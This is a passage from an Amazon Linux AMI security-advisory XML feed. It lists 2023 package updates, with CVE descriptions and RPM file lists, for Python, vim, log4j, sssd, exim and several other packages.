An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.
CVE-2022-45061:
An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45061" title="" id="CVE-2022-45061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24329" title="" id="CVE-2023-24329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38-debuginfo" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.9.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/python38-libs-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.9.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1715</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1715: important priority package update for microcode_ctl</title><issued date="2023-03-30 22:50:00" /><updated date="2024-02-14 20:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-38090:
Improper isolation of shared resources in some Intel(R) Processors when using Intel(R) Software Guard Extensions may allow a privileged user to potentially enable information disclosure via local access.
CVE-2022-33196:
Incorrect default permissions in some memory controller configurations for some Intel(R) Xeon(R) Processors when using Intel(R) Software Guard Extensions which may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2022-21216:
Insufficient granularity of access control in out-of-band management in some Intel(R) Atom and Intel Xeon Scalable Processors may allow a privileged user to potentially enable escalation of privilege via adjacent network access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21216" title="" id="CVE-2022-21216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33196" title="" id="CVE-2022-33196" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38090" title="" id="CVE-2022-38090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.41.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.41.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.41.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.41.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.41.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.41.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.41.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1716</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1716: important priority package update for vim</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1355:
NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1402.
CVE-2023-1264:
NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392.
CVE-2023-1175:
Incorrect Calculation of Buffer Size in GitHub repository vim/vim prior to 9.0.1378.
CVE-2023-1170:
A heap-based buffer overflow vulnerability was found in GitHub repository vim/vim prior to 9.0.1376 in Vim's utf_ptr2char() function of the src/mbyte.c file. This flaw occurs because there is access to invalid memory with put in visual block mode. An attacker can trick a user into opening a specially crafted file, triggering an out-of-bounds read that causes an application to crash, leading to a denial of service.
CVE-2023-0054:
Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.1145.
CVE-2023-0051:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1144.
CVE-2022-47024:
A null pointer dereference issue was discovered in the function gui_x11_create_blank_mouse in gui_x11.c in vim 8.1.2269 through 9.0.0339, which allows attackers to cause a denial of service or other unspecified impacts.
CVE-2022-3491:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0742.
CVE-2022-3324:
Stack-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0598.
CVE-2022-3256:
Use After Free in GitHub repository vim/vim prior to 9.0.0530.
CVE-2022-3016:
A heap use-after-free vulnerability was found in vim's get_next_valid_entry() function of the src/quickfix.c file. The issue occurs because vim is using freed memory when the location list is changed in autocmd. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap use-after-free that causes an application to crash, possibly executing code and corrupting memory.
CVE-2022-2982:
A heap use-after-free vulnerability was found in vim's qf_fill_buffer() function of the src/quickfix.c file. The issue occurs because vim uses freed memory when recursively using 'quickfixtextfunc.' This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap use-after-free that causes an application to crash, possibly executing code and corrupting memory.
CVE-2022-2862:
Use After Free in GitHub repository vim/vim prior to 9.0.0221.
CVE-2022-2849:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0220.
CVE-2022-2522:
A heap buffer overflow vulnerability was found in vim's ins_compl_infercase_gettext() function of the src/insexpand.c file. This flaw occurs when vim tries to access uninitialized memory when completing a long line. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap-based buffer overflow that causes an application to crash, possibly executing code and corrupting memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2522" title="" id="CVE-2022-2522" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2849" title="" id="CVE-2022-2849" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2862" title="" id="CVE-2022-2862" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2982" title="" id="CVE-2022-2982" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3016" title="" id="CVE-2022-3016" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3256" title="" id="CVE-2022-3256" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3324" title="" id="CVE-2022-3324" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3491" title="" id="CVE-2022-3491" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47024" title="" id="CVE-2022-47024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0051" title="" id="CVE-2023-0051" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0054" title="" id="CVE-2023-0054" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1170" title="" id="CVE-2023-1170" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1175" title="" id="CVE-2023-1175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1264" title="" id="CVE-2023-1264" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1355" title="" id="CVE-2023-1355" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-filesystem" version="9.0.1403" release="1.76.amzn1" epoch="2" 
arch="noarch"><filename>Packages/vim-filesystem-9.0.1403-1.76.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1403-1.76.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1403-1.76.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1403-1.76.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1403-1.76.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1403-1.76.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1403-1.76.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1403-1.76.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1403-1.76.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1403-1.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1717</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1717: important priority package update for python-twisted-web</title><issued date="2023-03-30 22:50:00" /><updated 
date="2023-04-05 20:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-39348:
Twisted is an event-based framework for internet applications. Starting with version 0.9.4, when the Host header does not match a configured host, `twisted.web.vhost.NameVirtualHost` will return a `NoResource` resource which renders the Host header unescaped into the 404 response, allowing HTML and script injection. In practice this should be very difficult to exploit, as being able to modify the Host header of a normal HTTP request implies that one is already in a privileged position. This issue was fixed in version 22.10.0rc1. There are no known workarounds.
CVE-2022-24801:
A flaw was found in python-twisted. This vulnerability occurs due to the parsing of illegal constructs in the twisted.web.http module. The illegal constructs include '+/-' in the Content-Length header, '\n and \t', etc. Non-conformant parsing leads to a desync if requests pass through multiple HTTP parsers. This flaw allows a remote attacker to perform an HTTP request smuggling attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24801" title="" id="CVE-2022-24801" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39348" title="" id="CVE-2022-39348" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-twisted-web" version="8.2.0" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-twisted-web-8.2.0-6.8.amzn1.x86_64.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-twisted-web-8.2.0-6.8.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-web" version="8.2.0" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/python26-twisted-web-8.2.0-6.8.amzn1.i686.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/python27-twisted-web-8.2.0-6.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1718</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1718: important priority package update for log4j</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23307:
A flaw was found in the log4j 1.x chainsaw component, where the contents of certain log entries are deserialized and possibly permit code execution. This flaw allows an attacker to send a malicious request with serialized data to the server to be deserialized when the chainsaw component is run.
CVE-2022-23305:
A flaw was found in the Java logging library Apache Log4j in version 1.x. JDBCAppender in Log4j 1.x is vulnerable to SQL injection in untrusted data. This allows a remote attacker to run SQL statements in the database if the deployed application is configured to use JDBCAppender with certain interpolation tokens.
CVE-2022-23302:
A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSSink in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if JMSSink is deployed and has been configured to perform JNDI requests.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23302" title="" id="CVE-2022-23302" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23305" title="" id="CVE-2022-23305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23307" title="" id="CVE-2022-23307" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j" version="1.2.17" release="16.14.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-1.2.17-16.14.amzn1.noarch.rpm</filename></package><package name="log4j-javadoc" version="1.2.17" release="16.14.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-javadoc-1.2.17-16.14.amzn1.noarch.rpm</filename></package><package name="log4j-manual" version="1.2.17" release="16.14.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-manual-1.2.17-16.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1719</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1719: low priority package update for openvpn</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0547:
OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0547" title="" id="CVE-2022-0547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-devel" version="2.4.12" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.12-1.43.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.12" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.12-1.43.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.4.12" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.12-1.43.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.12" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.12-1.43.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.12" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.12-1.43.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.12" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.12-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1720</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1720: medium priority package update for python-babel</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-42771:
Babel.Locale in Babel before 2.9.1 allows attackers to load arbitrary locale .dat files (containing serialized Python objects) via directory traversal, leading to code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42771" title="" id="CVE-2021-42771" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-babel" version="0.9.4" release="5.1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-babel-0.9.4-5.1.9.amzn1.noarch.rpm</filename></package><package name="python26-babel" version="0.9.4" release="5.1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-babel-0.9.4-5.1.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1721</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1721: important priority package update for gd</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-40145:
** DISPUTED ** gdImageGd2Ptr in gd_gd2.c in the GD Graphics Library (aka LibGD) through 2.3.2 has a double free. NOTE: the vendor's position is "The GD2 image format is a proprietary image format of libgd. It has to be regarded as being obsolete, and should only be used for development and testing purposes."
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40145" title="" id="CVE-2021-40145" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gd-devel" version="2.0.35" release="11.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gd-devel-2.0.35-11.11.amzn1.x86_64.rpm</filename></package><package name="gd" version="2.0.35" release="11.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gd-2.0.35-11.11.amzn1.x86_64.rpm</filename></package><package name="gd-progs" version="2.0.35" release="11.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gd-progs-2.0.35-11.11.amzn1.x86_64.rpm</filename></package><package name="gd-debuginfo" version="2.0.35" release="11.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gd-debuginfo-2.0.35-11.11.amzn1.x86_64.rpm</filename></package><package name="gd-devel" version="2.0.35" release="11.11.amzn1" epoch="0" arch="i686"><filename>Packages/gd-devel-2.0.35-11.11.amzn1.i686.rpm</filename></package><package name="gd" version="2.0.35" release="11.11.amzn1" epoch="0" arch="i686"><filename>Packages/gd-2.0.35-11.11.amzn1.i686.rpm</filename></package><package name="gd-progs" version="2.0.35" release="11.11.amzn1" epoch="0" arch="i686"><filename>Packages/gd-progs-2.0.35-11.11.amzn1.i686.rpm</filename></package><package name="gd-debuginfo" version="2.0.35" release="11.11.amzn1" epoch="0" arch="i686"><filename>Packages/gd-debuginfo-2.0.35-11.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1722</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1722: important priority package update for exim</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2021-38371:
The STARTTLS feature in Exim through 4.94.2 allows response injection (buffering) during MTA SMTP sending.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38371" title="" id="CVE-2021-38371" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-greylist" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.36.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1723</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1723: important priority package update for sssd</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4254:
A vulnerability was found in SSSD, in the libsss_certmap functionality. PKINIT enables a client to authenticate to the KDC using an X.509 certificate and the corresponding private key, rather than a passphrase or keytab. FreeIPA uses mapping rules to map a certificate presented during a PKINIT authentication request to the corresponding principal. The mapping filter is vulnerable to LDAP filter injection. The search result can be influenced by values in the certificate, which may be attacker controlled. In the most extreme case, an attacker could gain control of the admin account, leading to full domain takeover.
CVE-2021-3621:
A flaw was found in SSSD, where the sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root user into running a specially crafted sssctl command, such as via sudo, to gain root access. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3621" title="" id="CVE-2021-3621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4254" title="" id="CVE-2022-4254" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libsss_autofs" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package 
name="sssd-common-pac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.16.4" release="21.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.16.4-21.27.amzn1.noarch.rpm</filename></package><package name="sssd-proxy" 
version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.27.amzn1" epoch="0" 